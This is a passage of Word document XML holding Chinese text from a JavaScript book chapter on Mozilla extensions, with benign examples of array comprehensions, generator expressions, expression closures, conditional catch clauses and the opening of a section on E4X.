        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[expression for(variable in object)if(condition)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们看到，数组推导包含三个部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个没有循环体的</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>for/each</w:t>
      </w:r>
      <w:r>
        <w:t>循环。这部分推导包括一个变量（或者通过解构赋值得到的多个变量），它位于关键字</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>的左侧，</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>的右侧是一个对象（例如，这个对象可以是一个生成器、可迭代对象或数组）。尽管这个对象后面没有循环体，这段数组推导也能正确执行迭代，并能给指定的变量赋值。注意，在变量之前没有关键字</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>，其实这里使用了隐式的</w:t>
      </w:r>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t>，在数组推导中的变量在方括号的外部是不可见的，也不会覆盖已有的同名变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在执行遍历的对象之后，是圆括号中的关键字</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>和条件表达式，目前，这个条件表达式</w:t>
      </w:r>
      <w:r>
        <w:t>只是用做过滤迭代的值。每次</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环产生一个值之后会判断条件表达式。如果条件表达式返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则跳过这个值，这个值也不会被添加至数组当中。</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>从句是可选的，如果省略的话，相当于给数组推导补充一条</w:t>
      </w:r>
      <w:r>
        <w:t>if(true)</w:t>
      </w:r>
      <w:r>
        <w:t>从句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在关键字</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>之前是</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>，可以认为这个表达式是循环体。在迭代器返回了一个值并将它赋给一个变量，且这个变量通过了</w:t>
      </w:r>
      <w:r>
        <w:t>conditional</w:t>
      </w:r>
      <w:r>
        <w:t>测试之后，将计算这个表达式，并将表达式的计算结果插入到要创建的数组中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是一些具体的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data=[2,3,4,-5];//</w:t>
      </w:r>
      <w:r>
        <w:t>一个数</w:t>
      </w:r>
      <w:r>
        <w:t>组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>squares=[x*x for each(x in data)];//</w:t>
      </w:r>
      <w:r>
        <w:t>对每个元素求平方</w:t>
      </w:r>
      <w:r>
        <w:t>:[4,9,16,25]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果数组元素是非负数，求它的平方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>roots=[Math.sqrt(x)for each(x in data)if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=0)]//</w:t>
      </w:r>
      <w:r>
        <w:t>将一个对象的属性名放入新创建的数组中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o={a:1,b:2,f:function(){}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let allkeys=[p for(p in o)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let ownkeys=[p for(p in o)if(o.hasOwnProperty(p))]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> notfuncs=[k for([k,v]in Iterator(o))if(typeof v!=="function")]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="289" w:name="11_4_5_Sheng_Cheng_Qi_Biao_Da_Shi_"/>
      <w:r>
        <w:t>11.4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　生成器表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>中，将数组推导中的方括号替换成圆括号，它就成了一个生成器表达式。生成器表达式（</w:t>
      </w:r>
      <w:r>
        <w:t>generator expression</w:t>
      </w:r>
      <w:r>
        <w:t>）和数组推导非常类似（两者在圆括号内的语法几乎完全一样），只是它的返回值是一个生成器对象，而不是一个数组。和数组推导相比，使用生成器表达式的好处是可以惰性求值（</w:t>
      </w:r>
      <w:r>
        <w:t>lazy evalution</w:t>
      </w:r>
      <w:r>
        <w:t>），只有在需</w:t>
      </w:r>
      <w:r>
        <w:t>要的时候求值而不是每次都计算求值，这种特性可</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>以应用于潜在的无穷序列。使用生成器表达式而不用数组也有不足之处，生成器只支持对值的顺序存取而不是随机存取。和数组不同，生成器并没有索引，为了得到第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个值，必须遍历它之前的</w:t>
      </w:r>
      <w:r>
        <w:t>n-1</w:t>
      </w:r>
      <w:r>
        <w:t>个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章前面有这样一个</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function map(i,f){//</w:t>
      </w:r>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的每个元素，生成器都会生成</w:t>
      </w:r>
      <w:r>
        <w:t>f(x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let x in i)yield f(x);</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有了生成器表达式，就不必用这个</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>函数了。比如，下面这段代码定义一个新的生成器</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>用以对每个</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>f(x)</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>由生成器</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>生成：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let h=(f(x)for(x in g));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，例</w:t>
      </w:r>
      <w:r>
        <w:t>11-1</w:t>
      </w:r>
      <w:r>
        <w:t>中所提到的</w:t>
      </w:r>
      <w:r>
        <w:t>eachline()</w:t>
      </w:r>
      <w:r>
        <w:t>生成器，我们可以对其进行重写，可以通过这种方式来去除空格、注释和空行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let lines=eachline(text);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let trimmed=(l.trim()for(l in lines));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let nonblank=(l for(l in trimmed)if(l</w:t>
      </w:r>
      <w:r>
        <w:t>.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>l[0]!='#'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="11_5_Han_Shu_Jian_Xie_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>11.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数简写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于简单的函数，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>引入了一种简写形式：表达式闭包。如果函数只计算一个表达式并返回它的值，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>和花括号都可以省略，并将待计算的表达式紧接着放在参数列表之后，这里有一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let succ=function(x)x+1,yes=function()true,no=function()false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这只是一种简单的快捷写法，用这种形式定义的函数其实和带花括号和关键字</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>的函数完全一</w:t>
      </w:r>
      <w:r>
        <w:t>样。这种快捷写法更适用于当给函数传入另一个函数的场景，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对数组按照数字大小顺序进行降序排列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data.sort(function(a,b)b-a);//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个函数，用以返回数组元素的平方和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let sumOfSquares=function(data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.reduce(Array.map(data,function(x)x*x),function(x,y)x+y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="11_6_Duo_catchCong_Ju_"/>
      <w:r>
        <w:t>11.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　多</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r>
        <w:t>语句已经可以使用多</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句了，在</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句的参数中加入关键字</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>以及一个条件判断表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>这里可能会抛出多种类型的异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e if e instanceof ReferenceError){//</w:t>
      </w:r>
      <w:r>
        <w:t>这里处理引用错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e if e==="quit"){//</w:t>
      </w:r>
      <w:r>
        <w:t>这里处理抛出的字符串是</w:t>
      </w:r>
      <w:r>
        <w:t>"quit"</w:t>
      </w:r>
      <w:r>
        <w:t>的情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e if typeof e==="string"){//</w:t>
      </w:r>
      <w:r>
        <w:t>处理其他字符串的情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>处理余下的异常情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>finally{//finally</w:t>
      </w:r>
      <w:r>
        <w:t>从句正常执行</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当产生一个异常时，程序将会尝试依次执行每一条</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句。</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句中的命名参数即是这个异常，执行到</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>的时候会计算它的条件表达式。如果条件表达式计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则判断当前</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句中的逻辑，同时跳过其他的</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句。如果</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句中没有条件表达式，程序就会假设它包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>if true</w:t>
      </w:r>
      <w:r>
        <w:t>的条件，如果它之前的</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句都没有触发，那么这条</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>语句一定会执行。如果所有的</w:t>
      </w:r>
      <w:r>
        <w:t>catc</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>从句都包含条件，但没有一个条件是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，那么程序会向上抛出这个未捕获的异常。注意，因为</w:t>
      </w:r>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:t>从句中的条</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>件表达式已经在圆括号内了，因此也就不必像普通的条件语句一样再给它包裹一对圆括号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="11_7_E4X_ECMAScript_for_XML"/>
      <w:r>
        <w:t>11.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>E4X:ECMAScript for XML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"ECMAScript for XML"</w:t>
      </w:r>
      <w:r>
        <w:t>简称</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>，是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一个标准扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>，它为处理</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档定义了一系列强大的特性。</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino 1.6</w:t>
      </w:r>
      <w:r>
        <w:t>已经支持</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>。由于多数浏览器厂商还未支持</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>，因此</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>被认为是一种</w:t>
      </w:r>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>Spidermonkey</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>引擎的服务器端技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档（或者</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的元素或属性）视为一个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象，将</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>片段（在常见的父对象中包含多个</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>元素）视为一个紧密相关的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>列表对象。本节会介绍创建和使用</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一些方法。</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象是一类全新的对象，</w:t>
      </w:r>
      <w:r>
        <w:t>E4X</w:t>
      </w:r>
      <w:r>
        <w:t>中定义了专门的语法来描述它（接下来会看到）。我们知道，除了函数之外所有标准的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算结果都是</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>。正如函数和原始的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象有所区别一样，</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>对象也和原始</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象不同，对它们进行</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
